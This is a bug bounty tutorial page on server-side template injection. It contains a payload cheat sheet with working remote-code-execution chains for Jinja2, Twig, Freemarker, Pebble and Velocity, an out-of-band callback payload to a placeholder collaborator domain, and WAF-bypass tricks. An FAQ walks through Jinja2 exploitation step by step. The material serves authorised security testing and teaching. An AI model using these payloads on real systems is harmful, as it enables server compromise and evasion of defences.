Jinja2 arithmetic confirm{{7*7}} → 49 | {{7*'7'}} → 7777777 (Twig)
Twig fingerprint{{7*'7'}} → 7777777 | {{_self.env.registerUndefinedFilterCallback("id")}}
Freemarker fingerprint${7*7} → 49 | RCE: <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
Jinja2 MRO RCE chain{{''.__class__.__mro__[1].__subclasses__()[INDEX](['id'],stdout=-1).communicate()[0]}}
Twig _self RCE chain{{_self.env.registerUndefinedFilterCallback("system")}}{{"id"|system}}
Pebble Runtime chain{% set rt = "".class.forName("java.lang.Runtime") %}{{ rt.exec("id") }}
Velocity Runtime chain#set($rt = "".class.forName("java.lang.Runtime"))#set($e=$rt.exec("id"))
Blind SSTI — time-basedInject time.sleep(5) via MRO chain — measure response latency
Blind SSTI — OOB callbackurllib.request.urlopen('http://YOUR.COLLABORATOR.DOMAIN/x') via MRO chain
WAF bypass — concatenation|attr("__cla"+"ss__") instead of .__class__
WAF bypass — URL encodePercent-encode underscores: %5f%5fclass%5f%5f
WAF bypass — bracket notationrequest['__class__'] instead of request.__class__


You’ve finished the SSTI module — detection, engine fingerprinting, five RCE chains, WAF bypass, blind confirmation, and a submission-ready Critical report template. Day 27 takes you into BloodHound — the Active Directory attack path mapper that turns a foothold into domain admin.

SSTI Bug Bounty — Frequently Asked Questions

What is SSTI and how is it different from XSS?

Server-Side Template Injection happens when user input is evaluated by a template engine running on the server — not in the browser. XSS executes your payload in the victim’s browser, which limits you to session theft, DOM manipulation, and phishing. SSTI executes your payload on the server itself, which means you can run OS commands, read files, and exfiltrate data directly from the application host. The severity ceiling is completely different. XSS tops out at account takeover in most programs. SSTI reaches full Remote Code Execution. A well-documented SSTI-to-RCE finding typically pays 10x a comparable XSS finding on the same program.

Which template engines are most commonly found in bug bounty programs?

Jinja2 (Python/Flask/Django) is the most common finding I see on modern web applications and API backends. Twig (PHP/Symfony/Laravel) is close behind because of how widely PHP frameworks are deployed. Freemarker and Velocity appear frequently on Java enterprise applications — older fintech platforms, insurance portals, and internal tooling that hasn’t been modernised. Pebble is rarer but appears on Spring Boot applications. The practical distribution for bug bounty hunters is roughly: Jinja2 40%, Twig 30%, Freemarker 15%, Velocity 10%, Pebble 5%. Learn Jinja2 and Twig deeply first — they cover most of your live findings.

How do I confirm SSTI without triggering a WAF?

Start with the arithmetic polyglot — it uses no blocked keywords, only numbers and basic syntax characters. {{7*7}}, ${7*7}, and #{7*7} are benign-looking enough that most WAF rulesets don’t block them. If arithmetic evaluation confirms SSTI and you hit WAF blocks on keyword payloads, switch to string concatenation to reconstruct blocked attribute names: |attr("__cla"+"ss__") in Jinja2. Use bracket notation instead of dot notation. URL-encode individual underscores. The goal at the WAF bypass phase is to never send a full blacklisted keyword in plaintext — reassemble it on the server side after the WAF has already passed the request.

Is SSTI always Critical severity in bug bounty programs?

SSTI with confirmed RCE is always Critical — full stop. CVSS 9.8 is defensible and I have never had a triage team sustain a lower severity rating against a Burp Repeater screenshot showing OS command output. Where programs sometimes push back is on SSTI without confirmed RCE — for example, SSTI limited to information disclosure (reading environment variables, config values). That’s typically High, not Critical. If you can confirm the full chain from arithmetic evaluation through to OS command execution, you have a Critical. If you can only confirm information disclosure via template evaluation, argue for High and include a note that RCE is likely achievable with further research time.

What’s the fastest way to go from SSTI to RCE in Jinja2?

Confirm arithmetic evaluation first with {{7*7}}. Then dump the subclass list: {{''.__class__.__mro__[1].__subclasses__()}}. Search the response for subprocess.Popen — note its index position in the list. Then call Popen directly: {{''.__class__.__mro__[1].__subclasses__()[INDEX](['id'],stdout=-1,stderr=-1).communicate()[0]}}. That is the minimum chain. Three steps, three payloads. The only variable is the Popen index, which changes between Python versions and environments. The INDEX discovery step is the only one that requires any iteration — everything else is deterministic once you’ve confirmed Jinja2.

How should I handle SSTI on a target with no visible output (blind)?

Two techniques, in order of preference. First, time-based: inject a sleep payload and measure whether the response is delayed by the exact number of seconds you specified. A consistent five-second delay on sleep(5) but not on sleep(0) is statistically meaningful confirmation. Second, out-of-band: inject a payload that forces the server to make a DNS lookup or HTTP request to your Burp Collaborator or interactsh domain. When your listener receives the callback, you have timestamp-stamped, IP-verified proof of execution. The OOB method produces stronger evidence for your report — include the Collaborator interaction log as a screenshot. Only use OOB on fully authorised targets; the DNS request logs on the target server and is traceable.

← Day 25: Host Header Injection
Day 27: BloodHound Tutorial →

Further Reading

ME
Mr Elite
Bug Bounty Hunter · Penetration Tester · SecurityElites.com

The first time I found SSTI on a live program, it was in a PDF invoice generator. The field accepted a company name. I typed {{7*7}}. The PDF came back with “49” as the company name. That single arithmetic result turned into a $12,000 payout after I chained it to RCE through the Jinja2 MRO class. The triage team said it was the cleanest SSTI report they’d seen that quarter — because the report made the full chain impossible to dismiss. That’s what this day’s module is built to teach you: not just the exploit, but the documentation that gets it paid.

bug bounty hunting 2026 Jinja2 SSTI exploit server-side template injection SSTI bug bounty 2026 SSTI payloads SSTI to RCE template injection bug bounty web application hacking 2026
Join free to earn XP for reading this article Track your progress, build streaks and compete on the leaderboard.
Join Free

Leave a Comment

Your email address will not be published. Required fields are marked *